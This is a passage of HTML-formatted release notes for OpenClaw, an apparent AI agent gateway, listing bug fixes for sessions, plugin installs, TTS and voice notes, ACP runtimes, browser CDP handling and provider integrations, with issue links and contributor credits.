<li>QQ Bot: ignore self-echoed bot messages using the outbound ref-index marker, preventing mirrored replies from re-entering the agent loop while still allowing users to quote bot replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329883097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71912/hovercard" href="https://github.com/openclaw/openclaw/issues/71912">#71912</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangyc6003/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangyc6003">@wangyc6003</a>.</li>
<li>Sessions: separate reset freshness from session-store <code>updatedAt</code>, so heartbeat, cron, exec, and gateway bookkeeping no longer prevent configured daily/idle resets from rolling long-running channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285740424" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68315/hovercard" href="https://github.com/openclaw/openclaw/issues/68315">#68315</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232177002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63732/hovercard" href="https://github.com/openclaw/openclaw/issues/63732">#63732</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233422936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63820/hovercard" href="https://github.com/openclaw/openclaw/issues/63820">#63820</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291872905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69083" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69083/hovercard" href="https://github.com/openclaw/openclaw/issues/69083">#69083</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxatv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxatv">@maxatv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longhairedsi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longhairedsi">@longhairedsi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradfreels/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradfreels">@bradfreels</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akessel56/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akessel56">@akessel56</a>.</li>
<li>Sessions: clear queued system-event notices during <code>/new</code>, <code>/reset</code>, gateway <code>sessions.reset</code>, and daily/idle rollover so stale background updates cannot leak into the first prompt of the fresh session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265262942" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66864/hovercard" href="https://github.com/openclaw/openclaw/issues/66864">#66864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/opeyio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/opeyio">@opeyio</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cedillarack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cedillarack">@cedillarack</a>.</li>
<li>CLI/agents: keep <code>agents bind</code>, <code>agents unbind</code>, and <code>agents bindings</code> on setup-safe channel metadata paths so they do not preload bundled plugin runtimes or stage runtime dependencies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329103021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71743" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71743/hovercard" href="https://github.com/openclaw/openclaw/issues/71743">#71743</a>.</li>
<li>Plugins/registry: preserve explicit disabled plugin records during registry migration without persisting every unused bundled plugin discovered on disk. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Windows/native: keep CLI startup and bundled provider plugin loading off Windows ESM raw-path failure paths, fixing native onboarding/install smoke on Node 24.</li>
<li>Plugins/doctor: read bundled channel doctor capabilities through the same packaged plugin directory resolver used by plugin loading, so published installs keep Matrix DM allowlist repairs on <code>channels.matrix.dm.*</code> instead of writing invalid top-level <code>dmPolicy</code> keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329162302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71757" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71757/hovercard" href="https://github.com/openclaw/openclaw/issues/71757">#71757</a>.</li>
<li>Plugins/Windows: keep bundled plugin Jiti loaders off the native import path on Windows so channel plugins such as Telegram no longer crash with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code> on <code>C:\...</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329134759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71749/hovercard" href="https://github.com/openclaw/openclaw/issues/71749">#71749</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smeyer9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smeyer9">@smeyer9</a>.</li>
<li>Providers/Ollama: use Ollama's current <code>/api/web_search</code> endpoint and honor <code>https://ollama.com</code> model-provider base URLs for Ollama Web Search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329095399" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71741/hovercard" href="https://github.com/openclaw/openclaw/issues/71741">#71741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madhvidua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madhvidua">@madhvidua</a>.</li>
<li>Memory/Ollama: serialize Ollama memory embedding batches and add an inline batch timeout override, with longer defaults for local/self-hosted embedding providers.</li>
<li>Sessions/usage: exclude compaction checkpoint transcript snapshots from usage totals and session discovery, while keeping old checkpoint files removable.</li>
<li>CLI/agents: keep <code>openclaw agents list --json</code> on the config-only path by default, avoiding bundled plugin loading unless callers request <code>--bindings</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329088196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71739/hovercard" href="https://github.com/openclaw/openclaw/issues/71739">#71739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaloster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaloster">@kaloster</a>.</li>
<li>Plugins/install: force plugin dependency installs to stay project-local even when inherited npm config requests global installs, so successful installs still materialize the plugin's staged <code>node_modules</code>.</li>
<li>Providers/Google: transcode Gemini TTS PCM to Opus for voice-note targets so WhatsApp and other native voice-note replies can play as voice messages.</li>
<li>TTS/WhatsApp: mark non-Opus provider output as voice-note intent so channel delivery transcodes MP3/WebM replies to Ogg/Opus PTT audio.</li>
<li>Plugins/runtime deps: reuse existing external bundled-plugin stage roots when mirrored plugin roots are inspected again, avoiding second-generation <code>openclaw-unknown-*</code> stages and repeated first-turn restaging. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328214258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71599/hovercard" href="https://github.com/openclaw/openclaw/issues/71599">#71599</a>.</li>
<li>iOS/macOS Talk Mode: allow <code>talk.speechLocale</code> to set the speech recognition locale for non-English voice conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069022882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44688" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44688/hovercard" href="https://github.com/openclaw/openclaw/issues/44688">#44688</a>.</li>
<li>Plugins/providers: honor explicit plugin candidate lists instead of reading a persisted registry snapshot from local state, keeping candidate-scoped provider discovery hermetic.</li>
<li>Plugins/doctor: keep bundled plugin runtime-dependency repairs inside the managed OpenClaw stage even when user npm prefix/global config points npm at <code>$HOME/node_modules</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>ACP/sessions_spawn: reject normal OpenClaw config agent ids when callers explicitly request <code>runtime="acp"</code>, while allowing agents configured with <code>runtime.type="acp"</code> to resolve to their ACP harness id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234724919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63914" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63914/hovercard" href="https://github.com/openclaw/openclaw/issues/63914">#63914</a>.</li>
<li>ACP/sessions_spawn: apply <code>runTimeoutSeconds</code> to ACP child turns and dispatch those turns on the background subagent lane, so quota-stalled ACP harnesses do not occupy the main agent lane indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289936854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68823/hovercard" href="https://github.com/openclaw/openclaw/issues/68823">#68823</a>.</li>
<li>ACP/oneshot: reconcile runtime session identity before closing completed oneshot ACP runs, so finished <code>sessions.json</code> entries do not stay stuck with <code>acp.identity.state="pending"</code>.</li>
<li>ACPX: bundle <code>acpx@0.6.1</code> so unsupported generic model overrides fail clearly instead of silently falling back to the target adapter default.</li>
<li>ACP/models: document that non-Codex ACP model overrides require adapter support for ACP <code>models</code> plus <code>session/set_model</code>, so unsupported harnesses fail clearly instead of silently falling back to their defaults.</li>
<li>Plugins/Voice Call: treat missing provider credentials as setup-incomplete during Gateway startup and log the missing keys as a warning instead of a runtime startup error, while keeping explicit command/tool errors when used.</li>
<li>Android/Talk Mode: prevent duplicate TTS playback when fast or repeated final chat events arrive while Talk Mode is waiting for its own response. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076624751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46546/hovercard" href="https://github.com/openclaw/openclaw/issues/46546">#46546</a>.</li>
<li>Tooling/check:changed: pass parent heavy-check lock markers to lint lanes so <code>pnpm check:changed</code> no longer waits on its own <code>lint:extensions</code> child.</li>
<li>CLI/completion: dedupe provider auth flags before registering <code>openclaw onboard</code> options, so completion-cache refresh during update no longer fails when stale core fallback flags overlap plugin manifest flags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328717666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71667" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71667/hovercard" href="https://github.com/openclaw/openclaw/issues/71667">#71667</a>.</li>
<li>Diagnostics/trace: report live context usage from the current prompt snapshot instead of provider turn totals, avoiding false near-full context spikes on cached or tool-heavy runs.</li>
<li>Providers/Google: honor <code>models.providers.google.request.allowPrivateNetwork</code> for Gemini TTS and telephony TTS, matching Google image generation and media understanding. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329016945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71723/hovercard" href="https://github.com/openclaw/openclaw/pull/71723">#71723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ro-hansolo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ro-hansolo">@ro-hansolo</a>.</li>
<li>Providers/MiniMax: register <code>minimax-portal</code> for music and video generation, preserving OAuth auth and regional MiniMax base URLs across the shared <code>music_generate</code> and <code>video_generate</code> tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226014254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63241/hovercard" href="https://github.com/openclaw/openclaw/pull/63241">#63241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tars90percent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tars90percent">@tars90percent</a>.</li>
<li>Providers/onboarding: keep Runway and Alibaba Model Studio out of the text-inference setup picker by scoping their video-generation auth choices to the media setup flow. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253432057" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65856/hovercard" href="https://github.com/openclaw/openclaw/pull/65856">#65856</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</li>
<li>Plugins/Bonjour: stop the gateway from crash-looping on <code>CIAO PROBING CANCELLED</code> when the mDNS watchdog cancels a stuck probe. Restores the rejection-handler wiring dropped during the bonjour plugin migration and shares unhandled-rejection state across module instances so plugin-staged copies of <code>openclaw/plugin-sdk/runtime</code> register into the same handler set the host consults. Especially affects Docker on macOS, where mDNS probing reliably hits the watchdog. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/troyhitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/troyhitch">@troyhitch</a>.</li>
<li>Google Meet: report pinned Chrome nodes as offline or missing capabilities in setup/join diagnostics, keep inaccessible nodes out of auto-selection, and preflight local BlackHole/SoX requirements before agents try local Chrome.</li>
<li>Providers/MiniMax: route <code>image-01</code> requests to the dedicated image generation endpoint while preserving CN endpoint selection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206267950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61149" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61149/hovercard" href="https://github.com/openclaw/openclaw/issues/61149">#61149</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>.</li>
<li>Plugins/startup: remove ownerless bundled runtime-dependency install locks after a short grace window and include lock owner details when startup times out waiting for a plugin runtime-deps lock.</li>
<li>Plugins/install: anchor bundled runtime-dependency npm installs with an OpenClaw-owned package manifest so Linux updates cannot accidentally write to a parent <code>$HOME/node_modules</code> tree. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>Plugins/install: pass onboarding plugin config into plugin index writes so local plugin installs outside default discovery roots keep their install records. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: migrate shipped <code>plugins.installs</code> config records into the plugin index while stripping them from runtime config and future writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: durably remove shipped <code>plugins.installs</code> from <code>openclaw.json</code> after its records are copied into the plugin index, while rolling back the index write if config cleanup fails. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: keep migrated plugin install records in the plugin index even when the plugin manifest is missing or invalid, so update, uninstall, inspect, and audit can still recover broken installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/security: keep plugin audit JSON check ids stable while reporting plugin index install-record findings with updated wording. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/config: reject direct <code>plugins.installs</code> edits with guidance to use <code>openclaw plugins install</code>, <code>openclaw plugins update</code>, or <code>openclaw plugins uninstall</code> instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Live tests/voice: accept common STT variants for OpenClaw and ElevenLabs brand names so provider smoke tests fail on real regressions rather than equivalent transcripts.</li>
<li>Agents/replies: forward sanitized underlying agent failure details on external channels instead of replacing unknown failures with a generic retry message.</li>
<li>CLI/MCP: translate OpenClaw <code>mcp.servers.*.transport</code> entries into Claude/Gemini CLI <code>type</code> fields so streamable HTTP MCP servers load in CLI backend sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329018159" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71724/hovercard" href="https://github.com/openclaw/openclaw/pull/71724">#71724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Blockchain-Oracle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Blockchain-Oracle">@Blockchain-Oracle</a>.</li>
<li>Browser/CDP: honor configured remote and <code>attachOnly</code> CDP HTTP/WebSocket timeouts when opening tabs through raw CDP or <code>/json/new</code> fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132440350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54238/hovercard" href="https://github.com/openclaw/openclaw/pull/54238">#54238</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FuncWei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FuncWei">@FuncWei</a>.</li>
<li>WhatsApp/TTS: send visible text separately from PTT voice-note audio instead of relying on hidden voice-note captions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108175128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51081/hovercard" href="https://github.com/openclaw/openclaw/issues/51081">#51081</a>.</li>
<li>Browser/client: avoid telling agents to restart OpenClaw for dispatcher timeouts on external browser profiles such as <code>attachOnly</code>, remote CDP, and existing-session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044411472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40815" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40815/hovercard" href="https://github.com/openclaw/openclaw/pull/40815">#40815</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xsline/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xsline">@0xsline</a>.</li>
<li>Agents/TTS: preserve <code>[[audio_as_voice]]</code> directives on trusted text tool-result <code>MEDIA:</code> payloads so generated audio still delivers as a voice note. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076576982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46535" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46535/hovercard" href="https://github.com/openclaw/openclaw/pull/46535">#46535</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/azade-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/azade-c">@azade-c</a>.</li>
<li>Agents/TTS: keep queued tool media when an assistant ends with <code>NO_REPLY</code> on non-block delivery paths, so media-only generated audio replies still send. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198016737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60025" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60025/hovercard" href="https://github.com/openclaw/openclaw/pull/60025">#60025</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradlind1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradlind1">@bradlind1</a>.</li>
<li>Telegram/STT: frame inbound voice-note transcripts as machine-generated, untrusted text in agent context while preserving raw transcript mention detection. Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4018090172" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33360/hovercard" href="https://github.com/openclaw/openclaw/issues/33360">#33360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smartchainark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smartchainark">@smartchainark</a>.</li>
<li>Subagents/browser: show an actionable <code>/tools</code> notice when browser automation is configured but filtered out by the active tool profile, and document that coding-profile agents should use <code>tools.alsoAllow: ["browser"]</code> rather than subagent allowlists alone.</li>
<li>Control UI/Quick Settings: persist the assistant avatar override to browser local storage (mirroring the user avatar) so uploaded image data URLs no longer fail config validation with "Too big: expected string to have &lt;=200 characters". Also lift the gateway-side <code>ui.assistant.avatar</code> length cap to match the user avatar size budget for non-UI clients writing the field directly. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Plugin SDK: share diagnostic event subscriptions across duplicate source/dist module graphs so legacy root SDK imports still receive runtime diagnostic events.</li>
<li>Agents/Bedrock: prevent empty assistant stream-error turns from poisoning Converse replay by persisting, repairing, and replaying a non-empty fallback block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328056829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71572" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71572/hovercard" href="https://github.com/openclaw/openclaw/issues/71572">#71572</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328448230" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71627" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71627/hovercard" href="https://github.com/openclaw/openclaw/pull/71627">#71627</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Agents/Anthropic/Bedrock: strip thinking blocks with missing, empty, or blank replay signatures before provider conversion, falling back to non-empty omitted-reasoning text when needed so corrupted signed-thinking history no longer poisons subsequent turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070310932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45010/hovercard" href="https://github.com/openclaw/openclaw/issues/45010">#45010</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307495974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70054" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70054/hovercard" href="https://github.com/openclaw/openclaw/pull/70054">#70054</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/castaples/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/castaples">@castaples</a>.</li>
<li>Agents/Anthropic/Bedrock: preserve stripped thinking-only assistant replay turns with non-empty omitted-reasoning text so provider adapters keep strict user/assistant turn shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wujiaming88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wujiaming88">@wujiaming88</a>.</li>
<li>ACP/Codex: pass <code>sessions_spawn(runtime="acp")</code> model and thinking overrides into Codex ACP startup, normalize <code>openai-codex/*</code> refs and slash reasoning suffixes, and recognize managed Codex ACP wrapper commands without blocking current <code>gpt-5.5</code> sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042597081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40393" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40393/hovercard" href="https://github.com/openclaw/openclaw/issues/40393">#40393</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328579948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71643" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71643/hovercard" href="https://github.com/openclaw/openclaw/pull/71643">#71643</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/91wan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/91wan">@91wan</a>.</li>
<li>Browser/CDP: make readiness diagnostics use the same discovery-first fallback as reachability for bare <code>ws://</code> Browserless and Browserbase CDP URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299797320" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69532/hovercard" href="https://github.com/openclaw/openclaw/issues/69532">#69532</a>.</li>
<li>Browser/CDP: explain that loopback Browserless or other externally managed CDP services need <code>attachOnly: true</code> and matching Browserless <code>EXTERNAL</code> endpoint when reporting local port ownership conflicts, and fall back to the configured bare WebSocket root when a discovered Browserless endpoint rejects CDP. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095070385" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49815" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49815/hovercard" href="https://github.com/openclaw/openclaw/issues/49815">#49815</a>.</li>
<li>Gateway/reload: preserve indefinite <code>gateway.reload.deferralTimeoutMs: 0</code> semantics for channel hot reload deferrals so active agent runs are not interrupted by a forced channel restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>Agents/tool results: cap persisted Pi tool-result details and strip hidden diagnostics before provider conversion, preventing large debug payloads from bloating session transcripts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>ACP/OpenCode: update the bundled acpx runtime to 0.6.0 and cover the OpenCode ACP bind path in Docker live tests.</li>
